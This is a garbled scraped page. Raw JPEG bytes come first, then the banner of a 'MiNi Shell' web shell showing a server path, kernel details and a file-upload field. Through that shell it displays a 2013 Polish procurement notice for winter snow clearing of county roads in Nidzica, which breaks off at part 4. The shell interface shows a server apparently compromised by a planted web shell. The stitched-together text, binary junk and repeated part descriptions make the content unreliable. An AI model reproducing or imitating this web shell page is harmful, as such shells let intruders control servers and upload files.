JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131002/202677-N-2013.html

<p class="kh_header"><b>Nidzica: Zimowe utrzymanie dróg powiatowych zamiejskich i miejskich na terenie działania Powiatowego Zarządu Dróg w Nidzicy w sezonie 2013/2014</b><br>
<b>Numer ogłoszenia: 202677 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Nidzicy , ul. Kolejowa 29, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 089 6252313, faks 089 6254129.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych zamiejskich i miejskich na terenie działania Powiatowego Zarządu Dróg w Nidzicy w sezonie 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Zimowe utrzymanie dróg powiatowych zamiejskich i miejskich na terenie działania Powiatowego Zarządu Dróg w Nidzicy w sezonie 2013/2014  z podziałem na zadania:
Zadanie nr 1 - Odśnieżanie oraz zwalczanie śliskości na drogach powiatowych na terenie powiatu nidzickiego
Zadanie nr 2 - Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Janowiec Kościelny
Zadanie nr 3 -  Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Janowo
Zadanie nr 4 - Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Kozłowo
Zadanie nr 5 - Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Nidzica 

CPV :  
90620000 - usługi odśnieżania
90630000  -  usługi usuwania oblodzeń

Zamówienie obejmuje wykonanie następujących  robót : 
-	zamontowanie sprzętu na nośniki;
-	odśnieżanie dróg  i zwalczanie śliskości nawierzchni dróg o łącznej długości 336,724 km  zgodnie ze standardami z.u.d. :
a) drogi powiatowe zamiejskie 	- 327,824 km 
    w tym: 
	  - V standard  zud		-	158,596 km  
  	  -VI standard zud			-          169,228 km 
b) drogi powiatowe miejskie ( ulice wraz z chodnikami  w Nidzicy ) - 6,728 km
     w tym:
      - IV standard zud		-	 6,158 km 
     -   V standard zud		-	 0,570 km 

   (wykazy dróg powiatowych zamiejskich i miejskich objętych zud stanowią załącznik do Specyfikacji Istotnych Warunków Zamówienia) ;
-	zapewnienie dyspozycyjności pracowników Wykonawcy odpowiedzialnych za należyte wykonanie robót;
-	demontaż i konserwacja sprzętu Zamawiającego po zakończonym sezonie wraz z odwiezieniem na plac magazynowania.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w SST..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od zapisu sposobu dokonywania oceny spełniania warunków w tym zakresie. W celu wykazania spełniania przez wykonawcę warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający żąda oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego w ust.1 pkt 1. 2  siwz wykonawca wykaże, że w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowano co najmniej jedną  usługę  z zakresu zimowego utrzymania dróg, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane  lub są wykonywane należycie.

W przypadku Wykonawców zagranicznych Zamawiający dokona przeliczenia waluty obcej na PLN wg średniego kursu ogłoszonego przez Narodowy Bank Polski na dzień otwarcia ofert.

Ocena spełnienia warunku udziału w postępowaniu nastąpi na podstawie załączonych przez Wykonawcę do oferty wymaganych dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych warunków spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego w ust.1 pkt 1.3 siwz wykonawca wykaże, że dysponuje: 
1) odpowiednim potencjałem  technicznym do wykonania zamówienia tj.  w pełni    sprawnymi jednostkami  sprzętu i transportu  ( wymagania minimalne):  
Zadanie 1 	- samochód do 6 ton ładowności			-	szt. 2	
		- samochód powyżej 6 ton ładowności		-	szt. 3
		- ciągnik mały z pługiem do odśnieżania		-	szt. 1
- równiarka samojezdna min. 100 KM		-	szt. 1
- spycharka gąsienicowa min. 100 KM		-	szt. 1
- ładowarka o poj. łyżki do 0,5m3			-	szt. 1
- ładowarka o poj. łyżki od 0.5 do 1,5m3		-	szt. 1
- ładowarka o poj. łyżki pow. 0,5m3		-	szt. 1
- samochód samowyładowczy o poj. 5-10 ton	-	szt. 1
Zadanie 2 	- ciągnik rolniczy z napędem na dwie osie o mocy pow. 100 KM - 3 szt.
Zadanie 3	- ciągnik rolniczy z napędem na dwie osie o mocy pow. 100 KM - 2 szt.
Zadanie 4 	- ciągnik rolniczy z napędem na dwie osie o mocy pow. 100 KM - 4 szt.
Zadanie 5 	- ciągnik rolniczy z napędem na dwie osie o mocy pow. 100 KM - 3 szt.

Uwaga! W przypadku składania oferty na więcej niż jedną część Wykonawca musi dysponować odpowiednim sprzętem na każdą z nich oddzielnie. Podane ilości sprzętu, jakim muszą dysponować Wykonawcy, są minimalnymi wymaganiami, co oznacza, że w interesie Wykonawcy leży zapewnienie takiej ilości sprzętu, która pozwoli na sprawne prowadzenie akcji zimowej zgodnie z wymaganymi standardami

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie załączonych przez Wykonawcę do oferty wymaganych dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych warunków spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego w ust.1 pkt 1.3 siwz wykonawca wykaże, że dysponuje: 
1)	osobami zdolnymi do wykonania zamówienia w szczególności odpowiedzialnymi  za świadczenie usług  w celu obsadzenia podanych niżej stanowisk; 
Zadanie nr 1 :	
- kierownik - 	 1 osoba, wykształcenie średnie, 5 lat doświadczenia jako kierownik
  podobnych usług,
- dyspozytor - 1 osoba, wykształcenie średnie, 3 lata  doświadczenia jako dyspozytor 
  podobnych usług,
- kierowcy do samochodu ciężarowego - 5 osób, prawo jazdy, 
- kierowca ciągnika - 1 osoba, prawo jazdy,
- operator równiarki samojezdnej - 1 osoba, prawo jazdy,  uprawnienia do obsługi w/w sprzętu,
- operator spycharki gąsienicowej - 1 osoba, prawo jazdy, uprawnienia do obsługi w/w sprzętu
- operator ładowarki - 3 osoby, prawo jazdy, uprawnienia operatora ładowarki,
- kierowca samochodu samowyładowczego - 1 osoba, prawo jazdy, 

Zadanie nr 2 - kierowca ciągnika - 3 osoby, prawo jazdy, 
Zadanie nr 3 - kierowca ciągnika - 2 osoby, prawo jazdy,
Zadanie nr 4 - kierowca ciągnika - 4 osoby, prawo jazdy,
Zadanie nr 5 - kierowca ciągnika - 3 osoby, prawo jazdy,

Uwaga! W przypadku składania oferty na więcej niż jedną część Wykonawca musi dysponować odpowiednimi osobami na każdą z nich oddzielnie. Podane ilości osób, jakimi muszą dysponować Wykonawcy, są minimalnymi wymaganiami, co oznacza, że w interesie Wykonawcy leży zapewnienie takiej ilości osób, która pozwoli na sprawne prowadzenie akcji zimowej zgodnie z wymaganymi standardami

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie załączonych przez Wykonawcę do oferty wymaganych dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych warunków spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od zapisu sposobu dokonywania oceny spełniania warunków w tym zakresie. W celu wykazania spełniania przez wykonawcę warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający żąda oświadczenia , że wykonawca spełnia warunki określone w art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Do oferty należy załączyć również : 
1.	Wypełniony wzór formularza ofertowego.  (  zał. Nr  1siwz ) 
2.	Wypełniony kosztorys ofertowy  ( zał. Nr  2 siwz)  
3.	Pełnomocnictwo do podpisywania  oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie innych dokumentów 
(aktualnego  odpisu  z właściwego rejestru  lub centralnej ewidencji  i informacji o  działalności gospodarczej) .
4.	Dokument pełnomocnika Wykonawców  ubiegających  się wspólnie o udzielenie zamówienia w formie oryginału. 
5.	W przypadku wykonawców wspólnie  ubiegających się o udzielenie zamówienia dokumenty, o których mowa w pkt 9 ust. 2 siwz składa każdy z nich.  W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający będzie żądał przed zawarciem umowy, umowę regulującą współpracę tych wykonawców.
6.	Wykonawca wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp albo informację o tym, że nie należy do grypy kapitałowej (Zał. Nr 5 siwz). 
7.	Zgodnie z art. 24b ust 3 Zamawiający wyklucza z postepowania o udzielenie zamówienia Wykonawcę, który nie złożył wyjaśnień oraz Wykonawcę, który nie złożył listy o której mowa w pkt 9 ust 3 siwz)  
8.	Akceptowany ( parafowany) projekt  umowy  (zał. Nr 9a,9b siwz) 

II.Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu o  których mowa w ust.1, Zamawiający uzna, ze Wykonawca spełnia owe warunki, gdy wykaże, że na podstawie  art. 26 ust. 2b ustawy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia.

III. Jeżeli Wykonawca nie wykaże, że spełnia warunki udziału w postępowaniu, o których mowa w pkt 8 ust. 1   SIWZ, ani nie udowodni, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, zamawiający wykluczy wykonawcę z postępowania o udzielenie zamówienia publicznego w oparciu o przesłankę zawartą w art. 24 ust.2 pkt 4 Ustawy Prawo zamówień publicznych. 
IV. Ofertę wykonawcy wykluczonego uzna się za odrzuconą na podstawie art. 24 ust 4 ustawy Prawo zamówień publicznych.
V. Dokumenty należy przedstawić w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez wykonawcę .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie  której dokonano wyboru wykonawcy, w następującym zakresie:
1)	Zmiany wynagrodzenia Wykonawcy, w przypadku:
a) Zmiany urzędowej stawki podatku od towarów i usług (VAT),
b)	Wprowadzenia przez władzę ustawodawczą nowych podatków
2) Zmianą osób zdolnych do wykonania zamówienia w przypadku:
a)	zdarzeń losowych,
b)	polecenia Zamawiającego,
c)	uzasadnionego wystąpienia Wykonawcy
Zmiana którejkolwiek z osób musi być uzasadniona przez wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji i wyłącznie wtedy, gdy kwalifikacje wskazanych osób będą takie same lub wyższe od kwalifikacji osób wymaganych postanowieniami SIWZ. 
2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 ustawy Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.warmia.mazury.pl/powiat_nidzicki/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Nidzicy ,  13-100 Nidzica ul. Kolejowa 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 09:30, miejsce: Powiatowy Zarząd Dróg w Nidzicy 13-100 Nidzica ul. Kolejowa 29 pokój Nr 1 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. dot. sekcji II.2) Czas trwania zamówienia lub termin wykonania: od daty podpisania umowy do 30.04.2014r. 2. Czy przewiduje się ustanowienie dynamicznego systemu zakupów - nie, 3. Czy przewiduje się zawarcie umowy ramowej - nie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odśnieżanie oraz zwalczanie śliskości na drogach powiatowych na terenie powiatu nidzickiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących  robót : 
-	zamontowanie sprzętu na nośniki;
-	odśnieżanie dróg  i zwalczanie śliskości nawierzchni dróg o łącznej długości 336,724 km  zgodnie ze standardami z.u.d. :
a) drogi powiatowe zamiejskie 	- 327,824 km 
    w tym: 	
	  - V standard  zud		-	158,596 km  
  	  -VI standard zud			-          169,228 km 
b) drogi powiatowe miejskie ( ulice wraz z chodnikami  w Nidzicy ) - 6,728 km
     w tym:
      - IV standard zud		-	 6,158 km 
     -   V standard zud		-	 0,570 km 

   (wykazy dróg powiatowych zamiejskich i miejskich objętych zud stanowią załącznik do Specyfikacji Istotnych Warunków Zamówienia) ;
-	zapewnienie dyspozycyjności pracowników Wykonawcy odpowiedzialnych za należyte wykonanie robót;
-	demontaż i konserwacja sprzętu Zamawiającego po zakończonym sezonie wraz z odwiezieniem na plac magazynowania.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w SST..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Janowiec Kościelny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących  robót : 
-	zamontowanie sprzętu na nośniki;
-	odśnieżanie dróg  i zwalczanie śliskości nawierzchni dróg o łącznej długości 336,724 km  zgodnie ze standardami z.u.d. :
a) drogi powiatowe zamiejskie 	- 327,824 km 
    w tym: 	
	  - V standard  zud		-	158,596 km  
  	  -VI standard zud			-          169,228 km 
b) drogi powiatowe miejskie ( ulice wraz z chodnikami  w Nidzicy ) - 6,728 km
     w tym:
      - IV standard zud		-	 6,158 km 
     -   V standard zud		-	 0,570 km 

   (wykazy dróg powiatowych zamiejskich i miejskich objętych zud stanowią załącznik do Specyfikacji Istotnych Warunków Zamówienia) ;
-	zapewnienie dyspozycyjności pracowników Wykonawcy odpowiedzialnych za należyte wykonanie robót;
-	demontaż i konserwacja sprzętu Zamawiającego po zakończonym sezonie wraz z odwiezieniem na plac magazynowania.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w SST..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Janowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących  robót : 
-	zamontowanie sprzętu na nośniki;
-	odśnieżanie dróg  i zwalczanie śliskości nawierzchni dróg o łącznej długości 336,724 km  zgodnie ze standardami z.u.d. :
a) drogi powiatowe zamiejskie 	- 327,824 km 
    w tym: 	
	  - V standard  zud		-	158,596 km  
  	  -VI standard zud			-          169,228 km 
b) drogi powiatowe miejskie ( ulice wraz z chodnikami  w Nidzicy ) - 6,728 km
     w tym:
      - IV standard zud		-	 6,158 km 
     -   V standard zud		-	 0,570 km 

   (wykazy dróg powiatowych zamiejskich i miejskich objętych zud stanowią załącznik do Specyfikacji Istotnych Warunków Zamówienia) ;
-	zapewnienie dyspozycyjności pracowników Wykonawcy odpowiedzialnych za należyte wykonanie robót;
-	demontaż i konserwacja sprzętu Zamawiającego po zakończonym sezonie wraz z odwiezieniem na plac magazynowania.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w SST..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Kozłowo.</p>
